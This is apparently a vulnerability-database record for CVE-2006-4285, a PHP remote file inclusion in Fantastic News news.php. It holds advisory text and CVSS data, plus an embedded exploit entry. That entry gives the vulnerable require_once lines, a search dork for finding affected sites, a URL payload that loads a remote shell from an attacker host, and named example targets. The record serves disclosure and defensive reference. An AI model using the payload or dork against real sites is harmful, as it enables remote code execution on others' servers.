ID OSVDB:28031
Type osvdb
Reporter OSVDB
Modified 2006-08-19T06:34:02
Description
Manual Testing Notes — the CONFIG[script_path] request parameter is used, without validation, as the prefix of the require_once() paths in news.php (see the code excerpt in the exploit source below), so a URL supplied there causes remote PHP code to be included and executed:
http://[target]/[Script Path]/news.php?CONFIG[script_path]=http://[attacker]?
References:
Vendor URL: http://fscripts.com/free.php?id=1
Secunia Advisory ID: 21571
Generic Exploit URL: http://milw0rm.com/exploits/2221
FrSIRT Advisory: ADV-2006-3336
CVE-2006-4285
Bugtraq ID: 19613
{"type": "osvdb", "published": "2006-08-19T06:34:02", "href": "https://vulners.com/osvdb/OSVDB:28031", "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "viewCount": 12, "edition": 1, "reporter": "OSVDB", "title": "Fantastic News news.php CONFIG[script_path] Variable Remote File Inclusion", "affectedSoftware": [], "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:12", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4285"]}, {"type": "exploitdb", "idList": ["EDB-ID:2221"]}], "modified": "2017-04-28T13:20:12", "rev": 2}, "vulnersScore": 6.9}, "references": [], "id": "OSVDB:28031", "lastseen": "2017-04-28T13:20:12", "cvelist": ["CVE-2006-4285"], "modified": "2006-08-19T06:34:02", "description": "## Manual Testing Notes\nhttp://[target]/[Script Path]/news.php?CONFIG[script_path]=http://[attacker]?\n## References:\nVendor URL: http://fscripts.com/free.php?id=1\n[Secunia Advisory ID:21571](https://secuniaresearch.flexerasoftware.com/advisories/21571/)\nGeneric Exploit URL: http://milw0rm.com/exploits/2221\nFrSIRT Advisory: ADV-2006-3336\n[CVE-2006-4285](https://vulners.com/cve/CVE-2006-4285)\nBugtraq ID: 19613\n"}
{"cve": [{"lastseen": "2021-02-02T05:27:23", "description": "PHP remote file inclusion vulnerability in news.php in Fantastic News 2.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[script_path] parameter. NOTE: it was later reported that 2.1.5 is also affected.", "edition": 4, "cvss3": {}, "published": "2006-08-22T17:04:00", "title": "CVE-2006-4285", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4285"], "modified": "2018-10-17T21:34:00", "cpe": ["cpe:/a:fscripts:fantastic_news:2.1.3", "cpe:/a:fscripts:fantastic_news:2.1.5", "cpe:/a:fscripts:fantastic_news:2.1.1", "cpe:/a:fscripts:fantastic_news:2.1.2"], "id": "CVE-2006-4285", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4285", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fscripts:fantastic_news:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:fscripts:fantastic_news:2.1.5:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T15:47:13", "description": "Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability. CVE-2006-4285. 
Webapps exploit for php platform", "published": "2006-08-19T00:00:00", "type": "exploitdb", "title": "Fantastic News <= 2.1.3 script_path Remote File Include Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4285"], "modified": "2006-08-19T00:00:00", "id": "EDB-ID:2221", "href": "https://www.exploit-db.com/exploits/2221/", "sourceData": "#==============================================================================================\n#Fantastic News <= v2.1.3 (CONFIG[script_path]) Remote File Inclusion Exploit\n#===============================================================================================\n# \n#Critical Level : Dangerous \n# \n#Venedor site : http://fscripts.com/ \n# \n#Version : v2.1.2 & v2.1.3 \n# \n#================================================================================================\n#\n#Dork : \"Powered by Fantastic News v2.1.2\" or \"Powered by Fantastic News v2.1.3\"\n#\n#================================================================================================\n#\n#Bug in : news.php\n#\n#Vlu Code :\n#--------------------------------\n# require_once($CONFIG['script_path'].\"config.php\");\n# require_once($CONFIG['script_path'].\"functions/functions.php\");\n# require_once($CONFIG['script_path'].\"functions/mysql.php\");\n# require_once($CONFIG['script_path'].\"functions/template.php\");\n#\n#================================================================================================\n#\n#Exploit :\n#--------------------------------\n#\n#http://sitename.com/[Script Path]/news.php?CONFIG[script_path]=http://SHELLURL.COM?\n#\n#Example :\n# http://fscripts.com/ ====> vendor site =)) hahahahaaaaaa ====> 2.1.3\n# http://lnx.evanescencewebsite.com/PressArchive =====> 2.1.2\n#\n#\n#\n#================================================================================================\n#Discoverd By : SHiKaA\n#\n#Conatact : SHiKaA-[at]hotmail.com\n#\n#GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam 
(coder-cruze-wolf)\n==================================================================================================\n\n# milw0rm.com [2006-08-19]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2221/"}]}